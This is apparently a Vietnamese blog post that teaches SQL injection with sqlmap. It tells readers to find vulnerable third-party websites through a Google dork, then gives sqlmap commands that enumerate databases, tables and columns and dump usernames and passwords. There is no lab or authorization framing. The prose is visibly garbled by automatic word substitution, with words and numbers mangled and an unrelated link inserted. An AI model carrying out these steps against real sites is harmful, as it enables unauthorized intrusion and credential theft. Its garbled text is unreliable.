SQL Injection là một Một trong những phong cách hachồng web sẽ dần trsinh hoạt cần phổ cập bây giờ.

Bạn đang xem: Sqlmap là gì

Bằng bí quyết inject những mã Squốc lộ query/commvà vào đầu vào trước lúc đưa cho áp dụng website up date, bạn cũng có thể login mà lại không nên username cùng password, remote execution, dump data với lấy root của SQL server.

A. Chuẩn bị

1 OS bất kỳ đã cài Pybé nhỏ 2.7 (Kali Linux đang bao gồm sẵn mẫu này)SQLMAPhường tải về trên https://github.com/sqlmapproject/sqlbản đồ (Kali Linux đã và đang tất cả sẵn cái nàyB.

Xem thêm: Những Cuốn Sách Hay Của Og Mandino Là Ai, Tác Giả Og Mandino

Tìm 1 trang lỗi SQL Injection bất kỳ bên trên Google bằng phương pháp tìm kiếm tìm với từ bỏ khóa inurl php?id=B1: Mình thu được một trang dạng http://www.abc.com/product.php?id=200B2: Thêm 1 dấu ‘ vào thời gian cuối tương tác cùng coi coi cthị xã gì xẩy ra. Nếu đồ họa sản phẩm công nghệ biến hóa hoặc hiện nay lỗi như hình thì 80% trang kia bị Squốc lộ Injection

*

B3: Mở sqlmap lên với gõ câu lệnh sau để liệt kê danh sách các databasepynhỏ sqlmap.py -u http://www.abc.edu.vn/index.php?id=3trăng tròn –dbs

*

Sau lúc menu ra tất cả các Database thì chúng ta bỏ qua mất database information_schema nhé. Tại trên đây Database của trang web là database đang được gạch men đỏ

*

B2: Tiến hành trích xuất những bảng trong Database bởi lệnhpydong dỏng sqlmaps.py -u http://www.abc.vn/index.php?id=3trăng tròn -D thương hiệu database –tables

*

B3: Lựa lựa chọn 1 tables cơ mà bạn cần trích xuất đọc tin trong những số đó, sau đó xài lệnh sau nhằm List ra những cột vào đópyeo hẹp sqlbản đồ.py -u http://www.abc.vn/index.php?id=3trăng tròn -D thương hiệu database -T thương hiệu bảng –columns

*

Dễ thấy tất cả 2 cột nhưng mà chúng ta cần trích xuất sẽ là cột username/password.

B4: Trích xuất cột username bằng lệnhpynhỏ bé sqlmaps.py -u http://www.abc.vn/index.php?id=3đôi mươi -D thương hiệu database -T thương hiệu bảng -C tên cột –dump

*

B5: Trích xuất Password cũng bởi câu lệnh tương tựpybé sqlmap.py -u http://www.abc.vn/index.php?id=3đôi mươi -D tên database -T tên bảng -C thương hiệu cột –dump

Bài viết liên quan

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *